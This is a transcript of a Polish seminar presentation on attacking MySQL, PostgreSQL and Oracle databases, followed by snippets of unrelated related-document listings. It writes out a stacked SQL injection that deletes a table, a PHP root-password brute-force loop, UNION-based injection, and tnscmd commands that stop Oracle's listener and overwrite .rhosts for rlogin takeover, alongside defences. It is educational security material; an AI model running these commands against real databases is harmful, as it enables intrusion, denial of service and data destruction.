Bazy danych z punktu widzenia intruza. (MySQL, PostgreSQL, Oracle)
|
|
- Agata Kurek
- 7 lat temu
- Przeglądów:
Transkrypt
1 Bazy danych z punktu widzenia intruza. Bezpieczeń stwo systemów komputerowych. Temat seminarium: Bazy danych z punktu widzenia intruza. Autor: Mariusz Kuźma Bazy danych z punktu widzenia intruza. (MySQL, PostgreSQL, Oracle) 1
2 Bazy danych z punktu widzenia intruza Przebieg prezentacji Przebieg prezentacji: MySQL Wstę p MySQL z punktu widzenia intruza - Przepełnienie bufora (buffer overflow) - Atak HTML injection - Atak brutalny PostgreSQL Wstę p PostgreSQL z punktu widzenia intruza - Przepełnienie bufora (buffer overflow) - Atak HTML injection ORACLE Wstę p ORACLE z punktu widzenia intruza - Uzyskanie informacji - Prosty atak DoS - Nadpisanie dowolnego pliku - Przykładowy scenariusz ataku przejęcia kontroli nad bazą - Odczyt informacji ostatniego połączenia z listenerem - Ujawnienie tre ści skryptów JSP - Atak HTML injection - Moduł mod_plsql - Wykorzystanie standardowych pakietów PL/SQL Podsumowanie Literatura
3 Bazy danych z punktu widzenia intruza MySQL MySQL
4 Bazy danych z punktu widzenia intruza MySQL MySQL jest bardzo szybkim, solidnym systemem zarządzania relacyjnymi bazami danych (RDMS relation database management system). Baza danych umożliwia wydajne przechowywanie, przeszukiwanie, sortowanie i odczytywanie danych.[1] Serwer MySQL kontroluje dostęp do bazy w celu zapewnienia równoczesnego dostępu wielu użytkownikom, zagwarantowania szybkiego dostępu oraz dostępu jedynie dla uwierzytelnionych użytkowników. Reasumuj ąc serwer MySQL jest serwerem wielodostępowym i wielową tkowym.[1] MySQL jest obecnie dostępny w licencji Open Source, ale w konkretnych przypadkach można uzyskać licencje komercyjne. 4
5 Bazy danych z punktu widzenia intruza MySQL MySQL z punktu widzenia intruza MySQL z punktu widzenia intruza Przepełnienie bufora (buffer overflow) Atak HTML injection Atak brutalny 5
6 Bazy danych z punktu widzenia intruza MySQL Przepełnienie bufora (buffer overflow) Przepełnienie bufora (buffer overflow) Atak przepełnienia buforu wykorzystuje brak lub niewła ściwe sprawdzanie długości łańcuchów tekstowych w programach uprzywilejowanych.w ten sposób moż na zdobywać uprawnienia zarówno w systemach Unixowych jak i Microsoftu. Błąd przepełnienia bufora w MySQL, który mógłby zostać wykorzystany przez użytkownika mającego uprawnienia do dokonywania zmian w tablicach. Luka pozwala atakującemu na wykonanie arbitralnego kodu z przywilejami procesu mysqld. 6
7 Bazy danych z punktu widzenia intruza MySQL Przepełnienie bufora (buffer overflow) Przepełnienie bufora (buffer overflow) Działanie tego typu programów polega na wysłaniu na tyle długiego łańcucha, że przekracza on swoj ą długości ą zarezerwowane na stosie miejsce na zmienne lokalne podprogramu. Przekraczaj ąc dozwolon ą długość nadpisuje si ę inne obszary stosu m.in. adres powrotu podprogramu. W ten sposób można w nadpisanym obszarze pamięci umieścić dowolny program lub wywołanie powłoki a w miejscu adresu powrotu umieścić skok do przesłanego programu lub wywołania powłoki. Obrona polega na pisaniu poprawnych programów sprawdzaj ących długość pobieranych danych, zmodyfikowaniu kompilatora itp. 7
8 Bazy danych z punktu widzenia intruza MySQL Atak HTML injection Atak HTML injection Ataki HTML injection polegaj ą na przesłaniu stronie, która oczekuje od nas danych w postaci czystego tekstu, ciągu zawieraj ącego specjalnie spreparowanego kodu HTML.[2] Taki atak mógłby zostać wykorzystany przez użytkownika mającego uprawnienia do dokonywania zmian w tablicach (bazy MySQL). Obrona przed atakiem HTML injection polega na dokładnym sprawdzaniu zawarto ści każdej zmiennej przekazywanej do bazy danych. 8
9 Bazy danych z punktu widzenia intruza MySQL Atak HTML injection Przykład ataku HTML injection na baz ę MySQL Wyobraźmy sobie aplikacj ę która wyszukuje w tabeli wiersz o wskazanej przez użytkownika warto ści jednego z pól. Zapytanie może wyglądać w przybliżeniu tak: SELECT * FROM nazwa_tabeli WHERE pole=$jakies_dane W zapytaniu tym zostaje wstawiona warto ść przekazana przez użytkownika i przekazana do bazy. A teraz atakuj ący może przekazać następuj ący ciąg: $jakies_dane= 4;delete from nazwa_tabeli SELECT * FROM nazwa_tabeli WHERE pole= 4;delete from nazwa_tabeli Zapytanie spowoduje wyświetlenie pól o warto ści 4 i dodatkowo usunięcie wszystkich wpisów w tabeli nazwa_tabeli. 9
10 Bazy danych z punktu widzenia intruza MySQL Atak brutalny Atak brutalny Polega na generowaniu wszystkich możliwych kombinacji w zależności od długości hasła (przy znanym loginie) podczas nawiązywania połączenia z baz ą danych MySQL. Składnia wywołania funkcji mysql_connect w skrypcie PHP przy nawiązaniu połączenia z baz ą danych przez WWW wygląda następuj ąco: mysql_connect(host,login,haslo) 10
11 Bazy danych z punktu widzenia intruza MySQL Atak brutalny Przykład ataku brutalnego na baz ę mysql. Wyobraźmy sobie skrypt (np. PHP) który generuje wszystkie kombinacje hasła o danej długości i próbuje nawiązać połaczenie jako użytkownik root z baz ą danych mysql, przy znanym adrsie serwera MySQL.... do {... $haslo.=kolejnyznak; $db_lacz=mysql_connect("adres_serwera","root",$haslo); } while(!$db_lacz) echo Hasło roota =. $haslo;... Obrona polega na ustawieniu pola host w tabeli user na localhost. update user set host= localhost where user= root ; 11
12 Bazy danych z punktu widzenia intruza PostgreSQL PostgreSQL
13 Bazy danych z punktu widzenia intruza PostgreSQL PostgreSQL jest najbardziej dojrzał ą, najczęściej używan ą i darmow ą (obiektowo relacyjn ą) baz ą danych RDBMS SQL na świecie (MySQL nie należy do tej klasy). Do tej klasy nale żą między innymi serwery: Oracle8, Sybase11 czy InterBase5.1.[3] PostgreSQL jest rozpowszechniany na podstawie Powszechnej Publicznej Licencji GNU (GNU GPL). Jest dostępny m.in. na platformach: Linux, FreeBSD, Solaris, HP-UX, Irix, Windows 95, 98 i NT. 13
14 Bazy danych z punktu widzenia intruza PostgreSQL PostgreSQL z punktu widzenia intruza PostgreSQL z punktu widzenia intruza Przepełnienie bufora (buffer overflow) Atak HTML injection 14
15 Bazy danych z punktu widzenia intruza PostgreSQL Przepełnienie buforu (buffer overflow) Przepełnienie buforu (buffer overflow) Atak przepełnienia buforu polega dokładnie na analogi, jak w przypadku MySQL (slajd nr 5). Natomiast obrona jest identyczna jak w przypadku MySQL (slajd nr 6). 15
16 Bazy danych z punktu widzenia intruza PostgreSQL Atak HTML injection Atak HTML injection Atak HTML injection i obrona polega na analogi, jak w przypadku MySQL (slajd nr 7). 16
17 Bazy danych z punktu widzenia intruza ORACLE ORACLE
18 Bazy danych z punktu widzenia intruza ORACLE Oracle Listener jest to komponent odpowiedzialny przede wszystkim za komunikacj ę między klientami a serwerem Oracle (równie ż za komunikacj ę międzyserwerow ą ). Jest to element każdej instalacji Oracle DBMS.[4] Listener jest procesem działającym na serwerze bazodanowym, którego zadaniem jest przyjmowanie zlece ń od klientów. W systemach uniksowych jest to proces o nazwie tnslsnr, a w systemach Windows odpowiedni serwis. Listener nasłuchuje zlece ń na porcie TCP Do komunikacji między Oracle Client a Listenerem jest wykorzystywany protokół TNS (Transparent Network Substrate). 18
19 Bazy danych z punktu widzenia intruza ORACLE Największe zagroż enia związane z Oracle Listener nie wymagaj ą od atakującego żadnej wiedzy tajemnej. Nie s ą to klasyczne przepełnienia bufora wejściowego lub inne typowe błędy popełniane przez programistów (aczkolwiek takie te ż w nim można znaleźć). Największe słabości Listenera prawdopodobnie wynikaj ą ze złych założe ń przyjętych podczas projektowania tego oprogramowania. Do atakowania Oracle Listenera można zastosować prosty skrypt perl o nazwie tnscmd. Skrypt ten pozwala na wydawanie komend protokołu TNS. Można go uzyskać pod adresem cmd. 19
20 Bazy danych z punktu widzenia intruza ORACLE ORACLE z punktu widzenia intruza ORACLE z punktu widzenia intruza Uzyskanie informacji Prosty atak DoS Nadpisanie dowolnego pliku Przykładowy scenariusz ataku przejęcia kontroli nad bazą Odczyt informacji ostatniego połączenia z listenerem Ujawnienie treści skryptów JSP Atak HTML injection Moduł mod_plsql Wykorzystanie standardowych pakietów PL/SQL 20
21 Bazy danych z punktu widzenia intruza ORACLE Uzyskanie infromacji o systemie Uzyskanie informacji o systemie Standardowo Oracle Listener przyjmuje komendy od każdego i nie wymaga ż adnej autoryzacji, dzięki temu można uzyskać bardzo dużo informacji o systemie. Odpowiadaj ą za to komendy version i status protokołu TNS: tnscmd version -h adres_serwera -p 1521 tnscmd status -h adres_serwera -p 1521 Listener odpowiada na te zapytania zdradzając m.in.: dokładn ą wersj ę Oracle, rodzaj systemu operacyjnego, czas od uruchomienia instancji Oracle, ścieżki do plików z logami, opcje listenera (m.in. stan opcji security), rodzaj serwisów Oracle obsługiwanych przez Listenera, argumenty wywołania, kompletne środowisko (wartoś ci wszystkich zmiennych systemowych), w jakim został wywołany listener. 21
22 Bazy danych z punktu widzenia intruza ORACLE Uzyskanie infromacji o systemie Listing komendy tnscmd status -h p 1521 sending (CONNECT_DATA=(COMMAND=status)) to :1521 connect writing 89 bytes reading @....j... DESCRIPTION= TMP= VSNNUM= ERR=0 ALIAS=LISTENER SECURITY=OFF VERSION=TNSLSNR for Solaris: Version Production START_DATE=28-OCT :22:44 SIDNUM=1 LOGFILE=/opt/oracle/8i/network/log/listener.log PRMFILE=/opt/oracle/8i/network/admin/listener.ora TRACING=off UPTIME= SNMP=OFF 22
23 Bazy danych z punktu widzenia intruza ORACLE Prosty atak DoS (denial of service) Prosty atak DoS (denial of service) W standardowej konfiguracji Oracle Listener opcja SECURITY ustawiona jest na OFF i mówi o tym, że dla listenera można wydawać komendy bez jakiegokolwiek uwierzytelnienia. Polecenie tnscmd stop -h adres_serwera -p 1521 spowoduje posłuszne zakończenie działania listenera. Zblokowanie dostępu do listenera za pomoc ą komendy SERVICE_CURLOAD, polega na konsumcji 99% czasu precesora. Polecenie tnscmd -h adres_serwera --rawcmd "(CONNECT_DATA= (COMMAND=SERVICE_CURLOAD))" 23
24 Bazy danych z punktu widzenia intruza ORACLE Nadpisanie dowolnego pliku Nadpisanie dowolnego pliku Proces listenera (tnslsnr) zapisuje wszystkie zdarzenia w swoim logu. Dokładne miejsce i nazw ę pliku logu można zdalnie odczytać przez komend ę protokołu TNS - status (opcja LOGFILE)... LOGFILE=/opt/oracle/8i/network/log/listener.log... Za pomoc ą odpowiedniego zlecenia TNS położenie pliku logowania można zmieniać. Ponadto listener ślepo przyjmuje każd ą warto ść, niezależnie od tego, czy wyspecyfikowany plik istnieje (w takim wypadku zostanie nadpisany), czy te ż nie (w takim wypadku zostanie stworzony). Listener ma możliwo ść nadpisania i/lub utworzenia dowolnego pliku do którego ma uprawnienia proces Oracle Listener. 24
25 Bazy danych z punktu widzenia intruza ORACLE Nadpisanie dowolnego pliku Przykład nadpisania pliku (przekierowania logów do pliku /home/oracle/.rhosts) wojdwo@behemot$./tnscmd -h oracleserver --rawcmd " (DESCRIPTION= (CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=)) COMMAND=log_file)(ARGUMENTS=4) (SERVICE=LISTENER) (VERSION=1) (VALUE=/home/oracle/.rhosts)))" sending (DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file) (ARGUMENTS=4)(SERVICE=LISTENER) (VERSION=1)(VALUE=/home/oracle/.rhosts))) to oracleserver:1521 writing 205 bytes reading.m..."..a(description=(tmp=)(vsnnum= )(err=0)(command=log_file) (LOGFILENAME=/home/oracle/.rhosts)) 25
26 Bazy danych z punktu widzenia intruza ORACLE Przykładowy scenariusz ataku przejęcia kontroli nad bazą Przykładowy scenariusz ataku przejęcia kontroli nad bazą Polega na dokonaniu odpowiedniego wpisu do pliku. rhosts i wykorzystaniu serwisu rlogin. Krok 1: Zmiana pliku logu listenera na plik.rhosts (slajd nr 24) /home/oracle/.rhosts 26
27 Bazy danych z punktu widzenia intruza ORACLE Przykładowy scenariusz ataku przejęcia kontroli nad bazą Krok 2: Wpisanie adresu IP i loginu intruza do pliku. rhosts (tak aby IP i login był w jednej lini) wojdwo@behemot$./tnscmd -h oracleserwer \ --rawcmd "(CONNECT_DATA=(( wojdwo " sending (CONNECT_DATA=(( wojdwo to oracleserwer:1521 writing 93 bytes reading.$..."..(description=(err=1153)(vsnnum= ) (ERROR_STACK=(ERROR=i(CODE=1153)(EMFI=4) (ARGS='(CONNECT_DATA=(( wojdwo')) (ERROR=(CODE=303) (EMFI=1)))) 27
28 Bazy danych z punktu widzenia intruza ORACLE Przykładowy scenariusz ataku przejęcia kontroli nad bazą Krok 3: Za pomoc ą rlogin intruz loguje si ę bez żadnego użytkownika uwierzytelnienia jako użytkownik z prawami oracle. wojdwo@behemot$ rlogin -l oracle oracleserwer Obrona przed powyższym atakiem polega na wgraniu łaty wypuszczonej przez ORACLE (# ), która wprowadza dodatkowy parametr ADMIN_RESTRICTIONS do pliku konfiguruj ącego listenera (listener.ora). Wyłączenie parametru ADMIN_RESTRICTIONS uniemożliwia zdaln ą rekonfiguracj ę listenera. 28
29 Bazy danych z punktu widzenia intruza ORACLE Odczyt informacji ostatniego połączenia z listenerem Odczyt informacji ostatniego połączenia z listenerem Błąd polega na ujawnieniu informacji przekazywanej w poprzednim połączeniu innego użytkownika z listenerem. W praktyce ustawiamy w odpowiednim parametrze warto ść większ ą ni ż w rzeczywisto ści długość wydawanej komendy TNS (--cmdsize 30), co spowoduje możliwo ś ć odczytania części komendy wydanej do listenera przez poprzedniego uż ytkownika (COMMAND=status ). wojdwo@behemot$./tnscmd --rawcmd " " -h oracleserwer --cmdsize 30 sending to oracleserwer:1521 Faking command length to 30 bytes writing 59 bytes reading..."...(description=(err=1153)(vsnnum= ) (ERROR_STACK=(ERROR=(CODE=1153)(EMFI=4) (ARGS='CONNECT_DATA=(COMMAND=status)')) (ERROR=(CODE=303)(EMFI=1)))) 29
30 Bazy danych z punktu widzenia intruza ORACLE Ujawnienie treści skryptów JSP Ujawnienie treści skryptów JSP Podczas generowania strony WWW ze skryptu JSP tworzone s ą pliki tymczasowe w ścież ce /_pages serwera WWW. Jeden z plików z rozszerzeniem java zawiera kod źródłowy wykonywanego skryptu. W standardowej konfiguracji Apache rozpowszechnianego z Oracle katalog /_pages jest udostępniany przez serwer, w związku z tym intruz może odczytać kod źródłowy stron JSP obsługiwanych przez serwer. Obrona polega na zabronieniu w konfiguracji Apache dostępu do ścież ki /_pages. Dodatkowo wszystkie skrypty JSP powinny być przechowywane w postaci prekompilowanej. 30
31 Bazy danych z punktu widzenia intruza ORACLE Ujawnienie treści skryptów JSP Przykład ujawnienia treś ci skryptów JSP Najpierw należy uruchomić atakowany skrypt JSP, po to by serwer pobrał kod i go skompilował: Teraz można odczytać źródło skryptu JSP odwołując si ę do odpowiedniego pliku w ścież ce /_pages: mo.java 31
32 Bazy danych z punktu widzenia intruza ORACLE Atak HTML injection Atak HTML injection Przykładem niech będzie skrypt / demo/sql/tag/sample2.jsp. Skrypt ten jest interfejsem do tabeli zawieraj ącej dane o zarobkach w pewnej fikcyjnej firmie. Skrypt wyświetla w przeglądarce formularz WWW, w którym użytkownik wpisuje zapytanie. Np. wpisanie sal=800 powoduje wykonanie zapytania select ename,sal from scott.emp where sal=800 Przykładowo, wpisanie ciągu sal=800 union select username,userid from all_users spowoduje wykonanie zapytania select ename,sal from scott.emp where sal=800 union select username,userid from all_users 32
33 Bazy danych z punktu widzenia intruza ORACLE Moduł mod_plsql Moduł mod_plsql Moduł Apache mod_plsql służy do interpretowania na serwerze WWW kodu PL/SQL, który jest natywnym językiem baz Oracle. W module tym ujawniono wiele klasycznych błę dów: Przepełnienie bufora wejściowego w skrypcie służącym do wyś wietlania pomocy. Wysłanie zlecenia typu: (>1000 znaków) powoduje błąd segmentacji w procesie obsługującym to zlecenie. 33
34 Bazy danych z punktu widzenia intruza ORACLE Moduł mod_plsql Moduł mod_plsql Zastosowanie techniki double decode. Polega na przesłaniu do serwera zlecenia zawieraj ącego znaki specjalne (np. ukośnik) dwukrotnie zakodowane heksadecymalnie. W rezultacie możliwe jest obejście restrykcji serwera i odczytanie dowolnego pliku bąd ź katalogu w przestrzeni serwera WWW. Przykład odczytania pliku konfiguracyjnego plsql.conf: 255Cplsql.conf 34
35 Bazy danych z punktu widzenia intruza ORACLE Wykorzystanie standardowych pakietów PL/SQL Wykorzystanie standardowych pakietów PL/SQL W starszych wersjach Oracle (poniż ej 9i) wszystkie pakiety PL/SQL s ą udostępnianie przez Internet, za pomoc ą mod_plsql. Składnia wywołania procedury PL/SQL przez serwer WWW wygląda następuj ąco: y DAD (Database Access Descriptor) jest to struktura opisująca sposób łączenia si ę do bazy za pomoc ą pakietów PL/SQL. 35
36 Bazy danych z punktu widzenia intruza ORACLE Wykorzystanie standardowych pakietów PL/SQL Ataki za pomoc ą procedur z pakietu owa_util Sprawdzenie działania pakietu owa_util: Ujawnienie kodu żródłowego pakietu PL/SQL (np. file_util): me=file_util Wykonanie nieautoryzowanych zapyta ń do bazy: uery=select%20*%20from% 20all_users&p_cname=&p_nsize= 36
37 Bazy danych z punktu widzenia intruza ORACLE Wykorzystanie standardowych pakietów PL/SQL Ataki za pomoc ą procedur z pakietu owa_util Inne potencjalnie interesuj ące pakiety PL/SQL to np.: htp procedury pozwalaj ące na obsług ę protokołu HTTP, tcp procedury obsługi protokołu TCP, pozwalaj ą m.in. na nawiązanie połączenia zwrotnego (wychodz ącego), file_util procedury dostępu do plików, umożliwiaj ą np. pobranie dowolnego pliku z serwera. Obrona polega na ustawieniu parametru exclusion_list w pliku konfiguracyjnym wdbsrv.app. W starszych wersjach (poniż ej 9i) nie jest on włączony. 37
38 Bazy danych z punktu widzenia intruza Podsumowanie Podsumowanie
39 Bazy danych z punktu widzenia intruza Podsumowanie Podsumowanie: Bazy danych MySQL i PostgreSQL s ą bazami o dużo mniejszej złożoności programowej ni ż baza danych ORACLE. Mimo że bazy danych MySQL i PostgreSQL s ą programami Open Source maj ą mniej błędów ni ż ORACLE, który jest komercyjn ą baz ą danych. Dużo błędów wynika z tego, że użytkownicy zazwyczaj przyjmuj ą domyślne konfiguracje ustawie ń baz danych i serwerów WWW, co nie jest zalecane. 39
40 Bazy danych z punktu widzenia intruza Literatura Literatura
41 Bazy danych z punktu widzenia intruza Literatura Literatura [1] J. Smycz, D. Kaczmarek, PHP i MySQL Tworzenie stron WWW, wydawnictwo Helion, 2002 [2] Haking, Nr 1/2004 [3] PCkurier, Nr 8/2000 [4] Haking, Nr 1/2003
Produkty Oracle dominują na rynku
Oracle z punktu widzenia intruza Wojciech Dworakowski na CD Produkty Oracle dominują na rynku produktów bazodanowych. Na tej platformie działa wiele serwisów związanych
Bardziej szczegółowoPHP może zostać rozszerzony o mechanizmy dostępu do różnych baz danych:
PHP może zostać rozszerzony o mechanizmy dostępu do różnych baz danych: MySQL moduł mysql albo jego nowsza wersja mysqli (moduł mysqli ma dwa interfejsy: proceduralny i obiektowy) PostgreSQL Oracle MS
Bardziej szczegółowoZagrożenia trywialne. Zagrożenia bezpieczeństwa aplikacji internetowych. Parametry ukryte. Modyfikowanie parametrów wywołania
Zagrożenia trywialne Zagrożenia bezpieczeństwa aplikacji internetowych Rozwiązania charakterystyczne dla fazy rozwoju opisy rozpoznanych błędów, debugging, komentarze poprzednie wersje plików (cp plik.jsp
Bardziej szczegółowoPraca Magisterska "System zdalnego składania ofert kupna i sprzedaży za pośrednictwem Internetu" AUTOR PROMOTOR
System Oferta Praca Magisterska Niniejszy system powstał w ramach pracy magisterskiej "System zdalnego składania ofert kupna i sprzedaży za pośrednictwem Internetu". Politechnika Poznańska Wydział Informatyki
Bardziej szczegółowoWybrane metody ataków na systemy Oracle
Wybrane metody ataków na systemy Oracle Warsztat PLOUG'20 Wojciech Dworakowski Oracle Do niedawna uwaŝany za system bezpieczny Powód: brak badań brak dostępu do software brak zainteresowania badaczy produktami
Bardziej szczegółowoAplikacje WWW - laboratorium
Aplikacje WWW - laboratorium PHP + bazy danych Celem ćwiczenia jest przygotowanie prostej aplikacji internetowej wykorzystującej technologię PHP. Aplikacja pokazuje takie aspekty, współpraca PHP z bazami
Bardziej szczegółowo6. Bezpieczeństwo przy współpracy z bazami danych
6. Bezpieczeństwo przy współpracy z bazami danych 6.1. Idea ataku SQL injection Atak znany jako SQL injection jest możliwy wtedy, gdy użytkownik ma bezpośredni wpływ na postać zapytania wysyłanego do bazy
Bardziej szczegółowoInstalacja MySQL. http://dev.mysql.com/downloads/mysql/5.0.html#downloads
Instalacja MySQL Baza MySQL tworzona jest przez Szwedzką firmę MySQL AB strona domowa projektu to: www.mysql.com Wersję bezpłatną (różniącą się od komercyjnej brakiem wsparcia technicznego, nośnika i podręcznika)
Bardziej szczegółowoAplikacje webowe w obliczu ataków internetowych na przykładzie CodeIgniter Framework
Uniwersytet Zielonogórski Wydział Elektrotechniki, Informatyki i Telekomunikacji Aplikacje webowe w obliczu ataków internetowych na przykładzie CodeIgniter Framework mgr inż. Łukasz Stefanowicz dr inż.
Bardziej szczegółowoAplikacje WWW - laboratorium
Aplikacje WWW - laboratorium PHP + bazy danych Celem ćwiczenia jest przygotowanie prostej aplikacji internetowej wykorzystującej technologię PHP. Aplikacja pokazuje takie aspekty, współpraca PHP z bazami
Bardziej szczegółowoWINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8.
WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8. Gdy już posiadamy serwer i zainstalowany na nim system Windows XP, 7 lub 8 postawienie na nim serwera stron WWW jest bardzo proste. Wystarczy
Bardziej szczegółowoJęzyki programowania wysokiego poziomu. PHP cz.4. Bazy danych
Języki programowania wysokiego poziomu PHP cz.4. Bazy danych PHP i bazy danych PHP może zostać rozszerzony o mechanizmy dostępu do różnych baz danych: MySQL moduł mysql albo jego nowsza wersja mysqli (moduł
Bardziej szczegółowoProjektowani Systemów Inf.
Projektowani Systemów Inf. Wykład VII Bezpieczeństwo Copyrights by Arkadiusz Rzucidło 1 Bezpieczeństwo Bezpieczeństwo związane z danymi Konstrukcja magazynów danych Mechanizmy zapisu i modyfikacji danych
Bardziej szczegółowoInstrukcja instalacji Control Expert 3.0
Instrukcja instalacji Control Expert 3.0 Program Control Expert 3.0 jest to program służący do zarządzania urządzeniami kontroli dostępu. Dedykowany jest dla kontrolerów GRx02 i GRx06 oraz rozwiązaniom
Bardziej szczegółowoUsługi sieciowe systemu Linux
Usługi sieciowe systemu Linux 1. Serwer WWW Najpopularniejszym serwerem WWW jest Apache, dostępny dla wielu platform i rozprowadzany w pakietach httpd. Serwer Apache bardzo często jest wykorzystywany do
Bardziej szczegółowoPHP: bazy danych, SQL, AJAX i JSON
1 PHP: bazy danych, SQL, AJAX i JSON SYSTEMY SIECIOWE Michał Simiński 2 Bazy danych Co to jest MySQL? Jak się połączyć z bazą danych MySQL? Podstawowe operacje na bazie danych Kilka dodatkowych operacji
Bardziej szczegółowoMetody ataków sieciowych
Metody ataków sieciowych Podstawowy podział ataków sieciowych: Ataki pasywne Ataki aktywne Ataki pasywne (passive attacks) Polegają na śledzeniu oraz podsłuchiwaniu w celu pozyskiwania informacji lub dokonania
Bardziej szczegółowoAutor: Joanna Karwowska
Autor: Joanna Karwowska Wygodniejszym i wydajniejszym sposobem przechowywania i korzystania z dużej ilości danych zapisanych na serwerze jest współpraca z relacyjną bazą danych. 2 1. Utworzyć bazę danych.
Bardziej szczegółowoWykład 5: PHP: praca z bazą danych MySQL
Wykład 5: PHP: praca z bazą danych MySQL Architektura WWW Podstawowa: dwuwarstwowa - klient (przeglądarka) i serwer WWW Rozszerzona: trzywarstwowa - klient (przeglądarka), serwer WWW, serwer bazy danych
Bardziej szczegółowodziennik Instrukcja obsługi
Ham Radio Deluxe dziennik Instrukcja obsługi Wg. Simon Brown, HB9DRV Tłumaczenie SP4JEU grudzień 22, 2008 Zawartość 3 Wprowadzenie 5 Po co... 5 Główne cechy... 5 baza danych 7 ODBC... 7 Który produkt
Bardziej szczegółowoPawel@Kasprowski.pl Języki skryptowe - PHP. PHP i bazy danych. Paweł Kasprowski. pawel@kasprowski.pl. vl07
PHP i bazy danych Paweł Kasprowski pawel@kasprowski.pl Użycie baz danych Bazy danych używane są w 90% aplikacji PHP Najczęściej jest to MySQL Funkcje dotyczące baz danych używają języka SQL Przydaje się
Bardziej szczegółowoNajbardziej popularne metody włamań
Prezentacja: Najbardziej popularne metody włamań Aleksander Grygiel Plan prezentacji Skanery portów Ataki przez przepełnienie bufora Ataki z wykorzystaniem dowiązań w /tmp Ataki odmowy dostępu Skanowanie
Bardziej szczegółowoINSTALACJA SERWERA LOKALNEGO TYPU WAMP NA PRZYKŁADZIE PAKIETU KRASNAL SERV 2.7
Mgr inż. Marcin Dąbrowski INSTALACJA SERWERA LOKALNEGO TYPU WAMP NA PRZYKŁADZIE PAKIETU KRASNAL SERV 2.7 Wydział Organizacji i Zarządzania Politechnika Śląska w Gliwicach Zabrze 2009 1. Instalacja lokalnego
Bardziej szczegółowoWdrożenie modułu płatności eservice. dla systemu Magento 1.4 1.9
Wdrożenie modułu płatności eservice dla systemu Magento 1.4 1.9 - dokumentacja techniczna Wer. 01 Warszawa, styczeń 2014 1 Spis treści: 1 Wstęp... 3 1.1 Przeznaczenie dokumentu... 3 1.2 Przygotowanie do
Bardziej szczegółowoPLAN WYNIKOWY PROGRAMOWANIE APLIKACJI INTERNETOWYCH. KL IV TI 6 godziny tygodniowo (6x15 tygodni =90 godzin ),
PLAN WYNIKOWY PROGRAMOWANIE APLIKACJI INTERNETOWYCH KL IV TI 6 godziny tygodniowo (6x15 tygodni =90 godzin ), Program 351203 Opracowanie: Grzegorz Majda Tematyka zajęć 2. Przygotowanie środowiska pracy
Bardziej szczegółowoInternetowe bazy danych
Wyższa Szkoła Technologii Teleinformatycznych w Świdnicy Internetowe bazy danych wykład 6 dr inż. Jacek Mazurkiewicz e-mail: Jacek.Mazurkiewicz@pwr.wroc.pl Kontrola dostępu
Bardziej szczegółowoDostęp do baz danych z serwisu www - PHP. Wydział Fizyki i Informatyki Stosowanej Joanna Paszkowska, 4 rok FK
Dostęp do baz danych z serwisu www - PHP Wydział Fizyki i Informatyki Stosowanej Joanna Paszkowska, 4 rok FK Bazy Danych I, 8 Grudzień 2009 Plan Trochę teorii Uwagi techniczne Ćwiczenia Pytania Trójwarstwowy
Bardziej szczegółowoAplikacje WWW - laboratorium
Aplikacje WWW - laboratorium PHP. Celem ćwiczenia jest przygotowanie prostej aplikacji internetowej wykorzystującej technologię PHP. Aplikacja pokazuje takie aspekty, obsługa formularzy oraz zmiennych
Bardziej szczegółowoKonfiguracja vsftpd ( Very Secure FTP Server )
Konfiguracja vsftpd ( Very Secure FTP Server ) Jest to prawdopodobnie najbezpieczniejszy i najszybszy UNIX owy serwer FTP. Jego zaletami są m.in. prostota konfiguracji, bezpieczeństwo i szybkość (transfer
Bardziej szczegółowoData modyfikacji: 2013-08-14
Data modyfikacji: 2013-08-14 Co zawiera ten dokument: Ten dokument przedstawia, w jaki sposób zainstalować program Kancelaris PLUS 4 za pomocą standardowego instalatora na serwerze MySQL w wersji 5.0 i
Bardziej szczegółowoBezpieczeństwo systemów informatycznych
Bezpieczeństwo systemów informatycznych Rule Set Based Access Control ĆWICZENIE RSBAC 1 Wprowadzenie RSBAC to zestaw łat na jądro systemu Linux rozszerzających bezpieczeństwo systemu. Wspiera on mechanizmy
Bardziej szczegółowoProjektowanie systemów baz danych
Projektowanie systemów baz danych Seweryn Dobrzelewski 4. Projektowanie DBMS 1 SQL SQL (ang. Structured Query Language) Język SQL jest strukturalnym językiem zapewniającym możliwość wydawania poleceń do
Bardziej szczegółowoĆwiczenia laboratoryjne nr 11 Bazy danych i SQL.
Prezentacja Danych i Multimedia II r Socjologia Ćwiczenia laboratoryjne nr 11 Bazy danych i SQL. Celem ćwiczeń jest poznanie zasad tworzenia baz danych i zastosowania komend SQL. Ćwiczenie I. Logowanie
Bardziej szczegółowoZPKSoft WDoradca. 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja
ZPKSoft WDoradca 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja 1. Wstęp ZPKSoft WDoradca jest technologią dostępu przeglądarkowego do zasobów systemu ZPKSoft Doradca.
Bardziej szczegółowoDokumentacja systemu NTP rekrut. Autor: Sławomir Miller
Dokumentacja systemu NTP rekrut Autor: Sławomir Miller 1 Spis treści: 1. Wstęp 1.1 Wprowadzenie 1.2 Zakres dokumentu 2. Instalacja 2.1 Wymagania systemowe 2.2 Początek 2.3 Prawa dostępu 2.4 Etapy instalacji
Bardziej szczegółowoProblemy techniczne SQL Server
Problemy techniczne SQL Server Jak utworzyć i odtworzyć kopię zapasową za pomocą narzędzi serwera SQL? Tworzenie i odtwarzanie kopii zapasowych baz danych programów Kadry Optivum, Płace Optivum, MOL Optivum,
Bardziej szczegółowoDworakowski. Wojciech. Zagrożenia i metody ataku. Aplikacje internetowe -
Aplikacje internetowe - Zagrożenia i metody ataku Wojciech Dworakowski Agenda Aplikacja internetowa Trywialne zagrożenia Ukryte parametry Brak obsługi błędów Manipulacje parametrami doklejanie parametrów
Bardziej szczegółowoSystem. Instalacja bazy danych MySQL. Autor : Piotr Zielonka tel Piotrków Tryb., sierpień 2018r.
System FOKUS Instalacja bazy danych MySQL Autor : Piotr Zielonka tel. 601 99-73-79 pomoc@zielonka.info.pl Piotrków Tryb., sierpień 2018r. W wersji 2018.7.0 systemu FoKus wprowadzono funkcje umożliwiające
Bardziej szczegółowoCurrenda EPO Instrukcja Konfiguracji. Wersja dokumentu: 1.3
